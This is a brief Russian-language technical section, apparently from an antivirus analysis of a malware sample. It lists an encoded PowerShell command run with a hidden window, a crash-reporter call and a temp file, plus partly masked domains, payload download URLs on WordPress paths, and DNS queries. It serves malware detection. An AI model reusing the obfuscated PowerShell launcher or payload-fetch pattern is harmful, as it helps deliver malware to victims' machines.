Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAHIAcQBmAHIAZAB3AD0AKAAnAE8AJwArACgAJwB2AGoAJwArACcAbQA5AGkAJwArACcAcQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVABFAE0AUABcAHcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\769958.cvr
- 'ri####roperty.com':80
- 'la###nebohn.com':80
- 'le###edavis.com':80
- 'le###edavis.com':443
- 'ci####anter.co.uk':80
- 'ci####anter.co.uk':443
- 'fa###quie.com':80
- http://www.ri####roperty.com/wp-content/SMXB/
- http://www.ri####roperty.com/wp-content/SMXB
- http://la###nebohn.com/bGOHy/8qa07472/
- http://le###edavis.com/swift/5TQW6sf32736/
- http://ci####anter.co.uk/zy0b9r0s/lTZlc101auo37/
- http://fa###quie.com/wp-admin/da52f6268411/
- 'le###edavis.com':443
- 'ci####anter.co.uk':443
- DNS ASK ri####roperty.com
- DNS ASK la###nebohn.com
- DNS ASK le###edavis.com
- DNS ASK ci####anter.co.uk
- DNS ASK fa###quie.com
- DNS ASK on##md.com
- DNS ASK s1.##nmsb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAHIAcQBmAHIAZAB3AD0AKAAnAE8AJwArACgAJwB2AGoAJwArACcAbQA5AGkAJwArACcAcQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVABFAE0AUABcAHcATwByAEQAXAAyADAAMQA5AFwAIAAtAG... (со скрытым окном)